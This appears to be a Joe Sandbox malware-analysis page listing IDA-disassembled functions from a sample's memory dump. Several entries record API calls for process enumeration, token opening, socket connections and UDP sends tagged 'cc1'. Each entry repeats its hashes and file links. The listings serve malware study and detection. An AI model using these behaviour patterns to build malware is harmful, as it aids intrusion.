Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prologRegisterThrow__lockstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2094517415-3145022300
Opcode ID: a38696db8883c6e412b7eaff063af0cc41b27ba99ce18734625db7ec3f6a12ab
Instruction ID: 09b45142de05753de7c69bdbf6457aaf3d2fa62407697bd191c098d170482372
Opcode Fuzzy Hash: a38696db8883c6e412b7eaff063af0cc41b27ba99ce18734625db7ec3f6a12ab
Instruction Fuzzy Hash: 7511E53AD009259BCB06DBA8C861AEE7778FF44261F50091AF412BB291DB74EE44CB90

Function 10019E2D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10019E32
std::_Lockit::_Lockit.LIBCPMT ref: 10019E41

Part of subcall function 10032521: __lock.LIBCMT ref: 10032532

int.LIBCPMT ref: 10019E58

Part of subcall function 1001761A: std::_Lockit::_Lockit.LIBCPMT ref: 1001762B

std::locale::_Getfacet.LIBCPMT ref: 10019E61
std::bad_exception::bad_exception.LIBCMT ref: 10019E8F
__CxxThrowException@8.LIBCMT ref: 10019E9D
std::_Facet_Register.LIBCPMT ref: 10019EB3

Strings

bad cast, xrefs: 10019E87

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prologRegisterThrow__lockstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2094517415-3145022300
Opcode ID: 0c80b15087f34680015810c7033e5d2884b9b4a61e99b3f28240c0c78ac7cf9b
Instruction ID: d05c16b9301d055acfc5c7e800783bf76f4c6c3f03bfd771f04d9d3e91f3dee8
Opcode Fuzzy Hash: 0c80b15087f34680015810c7033e5d2884b9b4a61e99b3f28240c0c78ac7cf9b
Instruction Fuzzy Hash: 4E11E13AD005259BCB06DBA8CD51AEE77B8FF44261F50091AF412BF291DB78EE45CB90

Function 10028920 Relevance: 13.7, APIs: 9, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 100289E8
LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000), ref: 100289FB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A23
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?,00000000), ref: 10028A38
LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A47
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,00000000,?,?,?,?,00000000), ref: 10028A62
LocalFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A90
LocalFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 10028A97
_memmove.LIBCMT ref: 10028ABE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ByteCharLocalMultiWide$AllocFree$_memmove
String ID:
API String ID: 4220682249-0
Opcode ID: 2f1a7f7ee304bd94a922dd5f900a94e23e2b021bb6a72a085586578122ebdc68
Instruction ID: cd255971460cc628536006e1a77beb6d2239b6b8ba9b72674e75f7d8536ed572
Opcode Fuzzy Hash: 2f1a7f7ee304bd94a922dd5f900a94e23e2b021bb6a72a085586578122ebdc68
Instruction Fuzzy Hash: 2751B178A00306AFFB24CF68DC95FAEBBB5EB48710F540619F512AB6C0DB716944CB61

Function 10025F10 Relevance: 13.6, APIs: 9, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 100251A0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100251C5
Part of subcall function 100251A0: SwitchToThread.KERNEL32(?,?,?,?,?,1002240E), ref: 100251E9
Part of subcall function 100251A0: Sleep.KERNEL32(00000001,?,?,?,?,?,1002240E), ref: 100251FB

SetLastError.KERNEL32(000010DD), ref: 100260CD

Part of subcall function 10026240: WSASetLastError.WS2_32(0000273F), ref: 100262A3

SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 10025FEA
GetLastError.KERNEL32 ref: 10026062

Part of subcall function 10026390: WSAEventSelect.WS2_32(?,?,00000030), ref: 100263A4
Part of subcall function 10026390: connect.WS2_32(?,00000000,0000001C), ref: 100263CC
Part of subcall function 10026390: WSAGetLastError.WS2_32(?,10026009,?,00000000), ref: 100263DF

WSAGetLastError.WS2_32(?,00000000), ref: 10026053
WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 10026077
WSAGetLastError.WS2_32(?,?,?,?,?), ref: 10026086
SetLastError.KERNEL32(00000000), ref: 1002609A
GetLastError.KERNEL32 ref: 100260B1
SetLastError.KERNEL32(00000000), ref: 100260BD

Part of subcall function 10026330: bind.WS2_32(?,00000000,00000010), ref: 10026357

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast$CompareEventExchangeInterlockedSelectSleepSwitchThreadbindconnect
String ID:
API String ID: 62954821-0
Opcode ID: 0463821f4ad289b948d68cbd4809ac1d1d7892450be1f17897d28704699a627d
Instruction ID: e34a75ea22bd95397cfec8099c68b8bafc6c6bcc9b5293f9479f0a879be0e4df
Opcode Fuzzy Hash: 0463821f4ad289b948d68cbd4809ac1d1d7892450be1f17897d28704699a627d
Instruction Fuzzy Hash: D5518A7060060AAFE750CFA5DC84B9EFBB9FF48300F80811AE90587690DBB5A820CF91

Function 100104E4 Relevance: 13.6, APIs: 9, Instructions: 92processstringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100104E9

Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 1001052F
Process32First.KERNEL32(00000000,?), ref: 1001054E
lstrcmpA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?), ref: 10010587
Process32Next.KERNEL32(00000000,00000128), ref: 100105A7
CloseHandle.KERNEL32(00000000,?,?,?), ref: 100105B5
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?), ref: 100105E5
OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?), ref: 100105F2
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 100105FB

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseH_prologHandleOpenProcessProcess32$CreateFirstNextSnapshotTokenToolhelp32lstrcmp
String ID:
API String ID: 1332722264-0
Opcode ID: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
Instruction ID: b62764b0414d32b709b223facb62bba5ffd3a5644e312f6732ebb2b98ad689ba
Opcode Fuzzy Hash: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
Instruction Fuzzy Hash: EA316D75A00228AFEB10EFA4CC99EEEBB79FF04394F004469F51696191DF74AB44CA60

Function 10012B99 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012B9E

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10012D24
_free.LIBCMT ref: 10012D39

Strings

start, xrefs: 10012CA9, 10012CB8, 10012CB9
sid, xrefs: 10012C4F, 10012C62, 10012C63
plug_id, xrefs: 10012C88, 10012C9B, 10012C9C
device, xrefs: 10012C16, 10012C29, 10012C2A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$_free
String ID: device$plug_id$sid$start
API String ID: 2563830877-3941425863
Opcode ID: 06f33c6a7afceeb669533de6c43c198a8ef68df219ee55a0d66d9019832dd33a
Instruction ID: ca6ef6190c7e70453a8e314b231011d620bcf2d808ffe24bc5883f0540a4f65c
Opcode Fuzzy Hash: 06f33c6a7afceeb669533de6c43c198a8ef68df219ee55a0d66d9019832dd33a
Instruction Fuzzy Hash: 5E51D2B1900188AEEF05DF74CD45BEEBBB9EF85340F1441ADE406A7196DB706E89CB60

Function 10004568 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000456D
__wfopen_s.LIBCMT ref: 100045DC
CreateFileA.KERNEL32(?,00000000,00000001,00000000,00000003,00000080,00000000), ref: 100045FB
GetFileSize.KERNEL32(00000000,00000000), ref: 10004625
CloseHandle.KERNEL32(00000000), ref: 1000462C
__fread_nolock.LIBCMT ref: 1000465A

Strings

Get file size failed!, xrefs: 10004607, 1000460C, 10004614

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: File$CloseCreateH_prologHandleSize__fread_nolock__wfopen_s
String ID: Get file size failed!
API String ID: 2615374186-588257513
Opcode ID: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
Instruction ID: 0f310d6fd00b9f6b04008b82b283a21e80cb63aa65aa8e7d48c89f91d565bf33
Opcode Fuzzy Hash: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
Instruction Fuzzy Hash: 0041E3B6900608BFEB12DBA4CC46FEEB779EF05351F108026FA04F6191DF746A448B66

Function 10015977 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 10015987
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,1000FD6E,00000000), ref: 10015996
htons.WS2_32(00005CE3), ref: 100159AA
inet_addr.WS2_32(1000FD6E), ref: 100159C0
setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 100159DB
sendto.WS2_32(00000000,?,?,00000000,?,00000010), ref: 10015A1A

Strings

cc1, xrefs: 100159F1

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLasthtonsinet_addrsendtosetsockoptsocket
String ID: cc1
API String ID: 2322301496-2866713653
Opcode ID: 80009e3e445d42a75802dd211e57e40ae3bf450ebc27584ef9ca9705ea11fd59
Instruction ID: dc1c817a59feb693c876c12f7c11bb04391d40de1794ccaeec7b292ec1146153
Opcode Fuzzy Hash: 80009e3e445d42a75802dd211e57e40ae3bf450ebc27584ef9ca9705ea11fd59
Instruction Fuzzy Hash: E1219235540219BFEB00DFA4CC85EEE7BBCEF09350F448626F511AA091D7B1E689CBA1

Function 10020D20 Relevance: 12.2, APIs: 8, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000018,1005099E,1001E5A8,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DCE
HeapFree.KERNEL32(?,00000000,00000000,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DD9
_free.LIBCMT ref: 10020E9D
DeleteCriticalSection.KERNEL32(00000018,?), ref: 10020EFE
HeapFree.KERNEL32(?,00000000,00000000), ref: 10020F09
_free.LIBCMT ref: 10020F32
HeapDestroy.KERNEL32(?,00000001,?), ref: 10020F77
HeapCreate.KERNEL32(?,?,?,00000001,?), ref: 10020F86

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap$CriticalDeleteFreeSection_free$CreateDestroy
String ID:
API String ID: 2421925453-0
Opcode ID: 1ef0eb3b71c5151f6281f769c611efdfeca0364fa8ac9954e33d151b24c49d21
Instruction ID: 72729a094172b974382ca148bb2a68799dd086976ebad57966e83bfde928c9b9
Opcode Fuzzy Hash: 1ef0eb3b71c5151f6281f769c611efdfeca0364fa8ac9954e33d151b24c49d21
Instruction Fuzzy Hash: CA817A75A00616DFDB10CFA4C884BAEFBF5FF08304F004569E919AB252D775B948CBA0

Function 10023AB0 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,000000F1,00000000,00000000,93656AD3,?,00000000,00000000,?,?,?,00000000), ref: 10023AE3
_memmove.LIBCMT ref: 10023B7D

Part of subcall function 10022A20: EnterCriticalSection.KERNEL32(?), ref: 10022A54
Part of subcall function 10022A20: LeaveCriticalSection.KERNEL32(?), ref: 10022A6F
Part of subcall function 10022A20: timeGetTime.WINMM(?,00000000), ref: 10022AAE

setsockopt.WS2_32(?,0000FFFF,0000700B,?,00000004), ref: 10023BA9
CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 10023BB8
SetLastError.KERNEL32(00000000,?,00000000), ref: 10023BD4
shutdown.WS2_32(?,00000002), ref: 10023C30
closesocket.WS2_32(?), ref: 10023C37
HeapFree.KERNEL32(?,00000000,?,?), ref: 10023C55

Part of subcall function 10022970: timeGetTime.WINMM(?,?), ref: 100229A4
Part of subcall function 10022970: HeapAlloc.KERNEL32(?,00000000,0000008C,?,?), ref: 100229D3

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CompletionCriticalHeapSectionTimetime$AllocCreateEnterErrorFreeLastLeavePortPostQueuedStatus_memmoveclosesocketsetsockoptshutdown
String ID:
API String ID: 4126795834-0
Opcode ID: 3d74f2f2346b9e5e2997d44cfee395f9f00e06346d473ee4a727974a3047ff4a
Instruction ID: c3c4a6c590342b960d4fb879bec7ec832b813c069d8f557c9089d79be9513b4c
Opcode Fuzzy Hash: 3d74f2f2346b9e5e2997d44cfee395f9f00e06346d473ee4a727974a3047ff4a
Instruction Fuzzy Hash: 6F519F71600219BFEB15CF94DC86FAEBBB9FF08310F50811AFA15A62D0DB75A904CB90

Function 10048923 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 1004893B

Part of subcall function 100379EE: __FF_MSGBANNER.LIBCMT ref: 10037A03
Part of subcall function 100379EE: __NMSG_WRITE.LIBCMT ref: 10037A0A
Part of subcall function 100379EE: __malloc_crt.LIBCMT ref: 10037A2A

__lock.LIBCMT ref: 1004894E
__lock.LIBCMT ref: 1004899A
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,1005FB40,00000018,1004BCB1,1000DD8F,00000000,00000109), ref: 100489B6
EnterCriticalSection.KERNEL32(8000000C,1005FB40,00000018,1004BCB1,1000DD8F,00000000,00000109), ref: 100489D3
LeaveCriticalSection.KERNEL32(8000000C), ref: 100489E3

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: be17f33b865f95c0875abed3820e53539dfe9872d279ce3090774119e8ca9411
Instruction ID: 59e510b657f4a160520aa340233b794b6cc5843ca85406e28c707bcbb423cc72
Opcode Fuzzy Hash: be17f33b865f95c0875abed3820e53539dfe9872d279ce3090774119e8ca9411
Instruction Fuzzy Hash: 064126719006529BFB14CFA8CC9575CB7A0EF01365F35472AE524EB2C1C7B4AE54CB85

Function 10016E55 Relevance: 12.1, APIs: 8, Instructions: 101networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000100), ref: 10016E88
htons.WS2_32(00000001), ref: 10016E90
htons.WS2_32(00000001), ref: 10016EA1
htons.WS2_32(00000001), ref: 10016EAB
_malloc.LIBCMT ref: 10016EC9

Part of subcall function 10017284: _strtok.LIBCMT ref: 100172DD

_memmove.LIBCMT ref: 10016F0B
_free.LIBCMT ref: 10016F22
sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 10016F42

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: htons$_free_malloc_memmove_strtoksendto
String ID:
API String ID: 2957226208-0
Opcode ID: 1377283de9c2cf520224e8a1fa0e1bb336073e387463bc6137fc35ef034d5acf
Instruction ID: bfe267d7f567e0675f2bf13e0c9f13a44900987cbada512c2f353ae635174d3d
Opcode Fuzzy Hash: 1377283de9c2cf520224e8a1fa0e1bb336073e387463bc6137fc35ef034d5acf
Instruction Fuzzy Hash: 4C31E639900214AFCB11CFA4CC41ABABBF8EF08350F04819AFD55DF292E771E9518BA4

Function 10026390 Relevance: 12.1, APIs: 8, Instructions: 68networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,?,00000030), ref: 100263A4
connect.WS2_32(?,00000000,0000001C), ref: 100263CC
WSAGetLastError.WS2_32(?,10026009,?,00000000), ref: 100263DF
connect.WS2_32(?,00000000,0000001C), ref: 1002640F
WSAEventSelect.WS2_32(?,?,00000023), ref: 10026422
SetLastError.KERNEL32(00000000,?,10026009,?,00000000), ref: 1002643D
GetLastError.KERNEL32(?,10026009,?,00000000), ref: 10026452
WSASetLastError.WS2_32(00000000,?,10026009,?,00000000), ref: 10026463

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast$EventSelectconnect
String ID:
API String ID: 371153081-0
Opcode ID: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
Instruction ID: 52ca4863fcde4b83e53eff6488bf04bcb13c55dc1b2842da82c1cb5a4742651c
Opcode Fuzzy Hash: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
Instruction Fuzzy Hash: 9421C6302006119BF7249F60EC89B6A77AAEF44721F504628F596C65E0C7B6DC949B60

Function 10044297 Relevance: 10.7, APIs: 7, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

_wcscmp.LIBCMT ref: 1004437D
_wcscmp.LIBCMT ref: 10044393
___lc_wcstolc.LIBCMT ref: 100443BF
___get_qualified_locale.LIBCMT ref: 100443E4

Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A7CD
Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A7E6
Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A801
Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A817
Part of subcall function 1004A78D: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,100443E9,?,?,?,?,00000004,?,00000000), ref: 1004A86B

GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 1004447B
_memmove.LIBCMT ref: 10044531
__invoke_watson.LIBCMT ref: 10044586

Memory Dump Source

